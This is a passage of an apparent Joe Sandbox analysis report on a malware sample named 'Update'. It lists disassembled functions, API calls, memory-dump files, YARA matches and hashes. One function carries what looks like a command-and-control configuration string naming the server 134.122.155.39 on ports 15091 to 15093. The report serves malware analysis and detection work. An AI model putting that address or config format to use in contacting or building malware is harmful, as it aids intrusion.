                                                                                              • Part of subcall function 10009C41: __getptd_noexit.LIBCMT ref: 10009C47
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                            • String ID:
                                                                                            • API String ID: 418257734-0
                                                                                            • Opcode ID: 297936fcc0dbf5f526c0e08448a2f351abf61589ee907ea93caa2c8fedee672a
                                                                                            • Instruction ID: 91050fa4c4edb40f5b5d990f834f761f3b027d6385ed46559f27b3ea4901cb17
                                                                                            • Opcode Fuzzy Hash: 297936fcc0dbf5f526c0e08448a2f351abf61589ee907ea93caa2c8fedee672a
                                                                                            • Instruction Fuzzy Hash: 76E0ECB9904604DFF718DBA0C956E6E7775EF44241F210049F1015B2A6CB35B940DB24
                                                                                            Function 034F6403 Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __lock.LIBCMT ref: 034F641B
                                                                                              • Part of subcall function 034F8E5B: __mtinitlocknum.LIBCMT ref: 034F8E71
                                                                                              • Part of subcall function 034F8E5B: __amsg_exit.LIBCMT ref: 034F8E7D
                                                                                              • Part of subcall function 034F8E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,034F3F06,0000000D,03506340,00000008,034F3FFF,00000000,?,034F10F0,00000000,03506278,00000008,034F1155,?), ref: 034F8E85
                                                                                            • __tzset_nolock.LIBCMT ref: 034F642C
                                                                                              • Part of subcall function 034F5D22: __lock.LIBCMT ref: 034F5D44
                                                                                              • Part of subcall function 034F5D22: ____lc_codepage_func.LIBCMT ref: 034F5D8B
                                                                                              • Part of subcall function 034F5D22: __getenv_helper_nolock.LIBCMT ref: 034F5DAD
                                                                                              • Part of subcall function 034F5D22: _free.LIBCMT ref: 034F5DE4
                                                                                              • Part of subcall function 034F5D22: _strlen.LIBCMT ref: 034F5DEB
                                                                                              • Part of subcall function 034F5D22: __malloc_crt.LIBCMT ref: 034F5DF2
                                                                                              • Part of subcall function 034F5D22: _strlen.LIBCMT ref: 034F5E08
                                                                                              • Part of subcall function 034F5D22: _strcpy_s.LIBCMT ref: 034F5E16
                                                                                              • Part of subcall function 034F5D22: __invoke_watson.LIBCMT ref: 034F5E2B
                                                                                              • Part of subcall function 034F5D22: _free.LIBCMT ref: 034F5E3A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                            • String ID:
                                                                                            • API String ID: 1828324828-0
                                                                                            • Opcode ID: b5c9a24cd56a303b2a1e8f69340c6dda497c405d57a366cb505c071dd8698154
                                                                                            • Instruction ID: ae201afbdb30873188c4e0b16d4afe97a0e81b425811b4d084db00972ef7dabc
                                                                                            • Opcode Fuzzy Hash: b5c9a24cd56a303b2a1e8f69340c6dda497c405d57a366cb505c071dd8698154
                                                                                            • Instruction Fuzzy Hash: E6E0C238941B10DEC622FBE6B102A0F7220AB80F21F5C414FEB405F2E4CF304182E69E
                                                                                            Function 1000474C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 12stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(|p1:134.122.155.39|o1:15091|t1:1|p2:134.122.155.39|o2:15092|t2:1|p3:134.122.155.39|o3:15093|t3:1|dd:1|cl:1|fz:), ref: 10004755
                                                                                              • Part of subcall function 10003260: __wcsrev.LIBCMT ref: 10020655
                                                                                            Strings
                                                                                            • |p1:134.122.155.39|o1:15091|t1:1|p2:134.122.155.39|o2:15092|t2:1|p3:134.122.155.39|o3:15093|t3:1|dd:1|cl:1|fz:, xrefs: 10004750
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __wcsrevlstrlen
                                                                                            • String ID: |p1:134.122.155.39|o1:15091|t1:1|p2:134.122.155.39|o2:15092|t2:1|p3:134.122.155.39|o3:15093|t3:1|dd:1|cl:1|fz:
                                                                                            • API String ID: 4062721203-1314694870
                                                                                            • Opcode ID: ef503d5516fdfa215c481ae33ec846e637023be3d257a54ad483c27845c77df4
                                                                                            • Instruction ID: 3065bb4344b1789bcecd08ba6036c617636919b35652953f12b0e4d8e139a27a
                                                                                            • Opcode Fuzzy Hash: ef503d5516fdfa215c481ae33ec846e637023be3d257a54ad483c27845c77df4
                                                                                            • Instruction Fuzzy Hash: EFC08C72208214CFF202E3D4988876D7359EB33722F608039FA00CD012E672CC8097B1
                                                                                            Function 034E6EBC Relevance: 3.0, APIs: 2, Instructions: 8registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegCloseKey.ADVAPI32(80000001,034E6E9A), ref: 034E6EC9
                                                                                            • RegCloseKey.ADVAPI32(75BF73E0), ref: 034E6ED2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: ff09428d3edd81cfea7e0a672576acaf81b56b0260187943e788465d3459c235
                                                                                            • Instruction ID: 6273aee32d17081ad1c61fc55bcee42eea043ae58542c620a56f67ba041bd84f
                                                                                            • Opcode Fuzzy Hash: ff09428d3edd81cfea7e0a672576acaf81b56b0260187943e788465d3459c235
                                                                                            • Instruction Fuzzy Hash: 48C09B72D0113857CF10F7A4FD48D4D77B85F4C110F1144C2A104A3114C634BD45CF90
                                                                                            Function 6C3A0EF2 Relevance: 2.6, APIs: 2, Instructions: 63COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,6C3A0EE1,6C3A9DDA,?,00000000,00000000), ref: 6C3A0F48
                                                                                            • GetLastError.KERNEL32(?,00000000,?,6C3A0EE1,6C3A9DDA,?,00000000,00000000), ref: 6C3A0F52
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseErrorHandleLast
                                                                                            • String ID:
                                                                                            • API String ID: 918212764-0
                                                                                            • Opcode ID: 1413dfc2a2cd6deb1bce3bf704cf7ead1852f0ef734a695eeb326ed75335670c
                                                                                            • Instruction ID: 4c297581fef781d6c32cbdf648c276b096c1feafcca14a5623498129680c77bb
                                                                                            • Opcode Fuzzy Hash: 1413dfc2a2cd6deb1bce3bf704cf7ead1852f0ef734a695eeb326ed75335670c
                                                                                            • Instruction Fuzzy Hash: 24116F3360C19016C60517F99A4979D376DCB8B73CF250349E92EE7AC0EB32D4678A95
                                                                                            Function 6C387590 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C3877F3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Ios_base_dtorstd::ios_base::_
                                                                                            • String ID:
                                                                                            • API String ID: 323602529-0
                                                                                            • Opcode ID: f7d636138ce4088a6d1cba00ab0d216eb9a594f20d6ddd3deca44f4b3a3ef603
                                                                                            • Instruction ID: bd9ff0fb9d8f3c5b4dfb63c8a1a123a22dc24f791f01f9d9b58ee74f7fd75d94
                                                                                            • Opcode Fuzzy Hash: f7d636138ce4088a6d1cba00ab0d216eb9a594f20d6ddd3deca44f4b3a3ef603
                                                                                            • Instruction Fuzzy Hash: 61818BB1A11B018BD724CF24C880BA6B7E5FF49308F548A2DE49A47B80E775F549CF91
                                                                                            Function 6C3A0307 Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2dabcda0585e82290d49d84cec2ef0ea519b7641745922247e4d5225594cec0c
                                                                                            • Instruction ID: e84ce27c6e4ee5cdf1941ae928fe1bd467cc744f95d738c144362b25b93e1f04
                                                                                            • Opcode Fuzzy Hash: 2dabcda0585e82290d49d84cec2ef0ea519b7641745922247e4d5225594cec0c
                                                                                            • Instruction Fuzzy Hash: 7051C470A04244AFDB04CF98C881A9D7FB5EF89328F288158F85A5B751D372DE52CF91
                                                                                            Function 6C3A069D Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: __wsopen_s
                                                                                            • String ID:
                                                                                            • API String ID: 3347428461-0
                                                                                            • Opcode ID: d9e13e1a2f9f8d5d8bda3704c8dcca783ca751413efd6114b73de8aa7cfe448e
                                                                                            • Instruction ID: b62f5f724c18be2f29463695a2268dc74fefec22a8caaf8adc37065b795ce1bc
                                                                                            • Opcode Fuzzy Hash: d9e13e1a2f9f8d5d8bda3704c8dcca783ca751413efd6114b73de8aa7cfe448e
                                                                                            • Instruction Fuzzy Hash: D2114F71A0420AAFCB05DF98E94099B7BF9EF89304F154059F809AB311DA71D922CFA5
                                                                                            Function 034FA6F2 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,034F454A,00000000,00000001,00000000,00000000,00000000,?,034F3E0D,00000001,00000214,?,034F4500), ref: 034FA735
                                                                                              • Part of subcall function 034EF91B: __getptd_noexit.LIBCMT ref: 034EF91B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap__getptd_noexit
                                                                                            • String ID:
                                                                                            • API String ID: 328603210-0
                                                                                            • Opcode ID: 72ae508076be0de94aed332ddd116a627e065c4c34aeb7aecd0084b1e214fe3e
                                                                                            • Instruction ID: 62e7995af7f249d5359fec4fb1539c5211634b7cfa2dc7680fed4404df89ccb2
                                                                                            • Opcode Fuzzy Hash: 72ae508076be0de94aed332ddd116a627e065c4c34aeb7aecd0084b1e214fe3e
                                                                                            • Instruction Fuzzy Hash: 3A01B1392002159EEB24EE25DC44F6B37E8AF817A4F1D862BE9198F2A0D734D4018F58
                                                                                            Function 1000E555 Relevance: 1.6, APIs: 1, Instructions: 50memoryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,10009FFA,00000000,00000001,00000000,00000000,00000000,?,100098C1,00000001,00000214,?,10009FB0), ref: 1000E598
                                                                                              • Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap__getptd_noexit
                                                                                            • String ID:
                                                                                            • API String ID: 328603210-0
                                                                                            • Opcode ID: d06f835299f278651632b800e6ea60e14773797a6a441bb7e279904f59b9ce12
                                                                                            • Instruction ID: 103cc215c0c144a9a87f3cbc911116c8ac8a7c4356fc0ca5ef77af160fbe558d
                                                                                            • Opcode Fuzzy Hash: d06f835299f278651632b800e6ea60e14773797a6a441bb7e279904f59b9ce12
                                                                                            • Instruction Fuzzy Hash: E9012435205A958EFB18CF24CC54B5A37D4EB853E6F018929E815AA0D4EB70DC00CB80
                                                                                            Function 6C3A3515 Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 6C39A641: HeapAlloc.KERNEL32(00000000,6C39DBE2,?,?,6C39DBE2,00000220,?,?,?), ref: 6C39A673
                                                                                            • RtlReAllocateHeap.NTDLL(00000000,00000000,?,6C392C0C,00000000,?,6C39FC77,00000000,6C392C0C,000000FF,?,?,?,6C392CE6,?,000000FF), ref: 6C3A3572
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocAllocate
                                                                                            • String ID:
                                                                                            • API String ID: 2177240990-0
                                                                                            • Opcode ID: 6333b56ace79e0ea95e72b82c2e02feb6ce64c4c49cb9e19bb6f28686d86439e
                                                                                            • Instruction ID: 95a4c1f0e0b57da3336d58cf9b99c4e1ebe5740c26c341077f7bf19ed16194b8
                                                                                            • Opcode Fuzzy Hash: 6333b56ace79e0ea95e72b82c2e02feb6ce64c4c49cb9e19bb6f28686d86439e
                                                                                            • Instruction Fuzzy Hash: A3F0463264510066DF441AAFEC00ABA37ADCFC2B78B104115F864A7A90EB22D6268D72
                                                                                            Function 6C39CF6F Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,?,?,6C39A8E0,00000001,00000364,?,00000006,000000FF,?,?,6C395151,?,6C371A6D,00000000), ref: 6C39CFB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: ae9873cf208bab71d6edd9d09f14a22819557aeac2469c081aab18dc5ccf7e41
                                                                                            • Instruction ID: 1cc9f19b65d018d1dadcccc61a813a14a861e93c0af7135549dddf0d46b54888
                                                                                            • Opcode Fuzzy Hash: ae9873cf208bab71d6edd9d09f14a22819557aeac2469c081aab18dc5ccf7e41
                                                                                            • Instruction Fuzzy Hash: F1F0E93264552557EF117E26B804A8BB75CEF52768B248126EC1BD6980FB31D8048FB1
                                                                                            Function 1000608A Relevance: 1.5, APIs: 1, Instructions: 25registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID:
                                                                                            • API String ID: 71445658-0
                                                                                            • Opcode ID: ce9d18141ac8a2415a65a9b8a38807c62c68c0f35cc9388145c160860f9cea29
                                                                                            • Instruction ID: d3b2713253b45803e0e36550a0a091f6b3b019736998aa0157c013c20421de29
                                                                                            • Opcode Fuzzy Hash: ce9d18141ac8a2415a65a9b8a38807c62c68c0f35cc9388145c160860f9cea29
                                                                                            • Instruction Fuzzy Hash: B2E09274908216EADB25DB80C984BFE73B5FB64385F30814DE8042F094D375AE84AA91
                                                                                            Function 6C3A9FEC Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(FFFFFFFF,00000000,?,6C3A9C90,?,?,00000000,?,6C3A9C90,FFFFFFFF,0000000C), ref: 6C3AA009
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 7ff8b5be17f6cb9203be8aed4c1200a9f8c18d1aa15f7316413d504b827978b7
                                                                                            • Instruction ID: ee21946de02149c3840cc275ea12a5e2a88f51be7bdbabbd6513e436b34cda6d
                                                                                            • Opcode Fuzzy Hash: 7ff8b5be17f6cb9203be8aed4c1200a9f8c18d1aa15f7316413d504b827978b7
                                                                                            • Instruction Fuzzy Hash: D7D06C3210020DBBDF028E84DC06EDA3BAAFB48714F014000FA18A6020C732E861EB94
                                                                                            Function 10005E07 Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3660427363-0
                                                                                            • Opcode ID: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                            • Instruction ID: fe46c43de78f47d222b333b3703367a29387d0af8959c827854050506a177f75
                                                                                            • Opcode Fuzzy Hash: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                            • Instruction Fuzzy Hash: 26C08C30C4C75EE2D032E8101C0A1BDB3E4E778299F3005BFAC452D884E4F4A9C0B6EA
                                                                                            Function 100060DF Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 1001FAB1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentThread
                                                                                            • String ID:
                                                                                            • API String ID: 2882836952-0
                                                                                            • Opcode ID: aaf3e0f0d0f8f1f3a4ac2f5b8bd5fab41d3eaa100fa15abfee4d2d644b7fd40f
                                                                                            • Instruction ID: 723c430d69d621f95a846468934f8435ff5600678504d51602c72318876ab3a6
                                                                                            • Opcode Fuzzy Hash: aaf3e0f0d0f8f1f3a4ac2f5b8bd5fab41d3eaa100fa15abfee4d2d644b7fd40f
                                                                                            • Instruction Fuzzy Hash: B9D012B8104910C7E310DB50C4C465EB2E1FF58300F30C519E92D8B615C738F8C18652
                                                                                            Function 10004274 Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00006110,00000000), ref: 10020693
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateThread
                                                                                            • String ID:
                                                                                            • API String ID: 2422867632-0
                                                                                            • Opcode ID: 13c8da13fabdb43a0039df29cdbc36604e7b86c2d4870efbc9606bf7f6935c8f
                                                                                            • Instruction ID: caee183b5a6c68c45fee89ce5ab94ef9cb690e012967d693a85690ee7ea4d081
                                                                                            • Opcode Fuzzy Hash: 13c8da13fabdb43a0039df29cdbc36604e7b86c2d4870efbc9606bf7f6935c8f
                                                                                            • Instruction Fuzzy Hash: 20C04C3424C314E9F430D1442C46B5C1401F75EB65EB543177B205E4D74D7040C13553
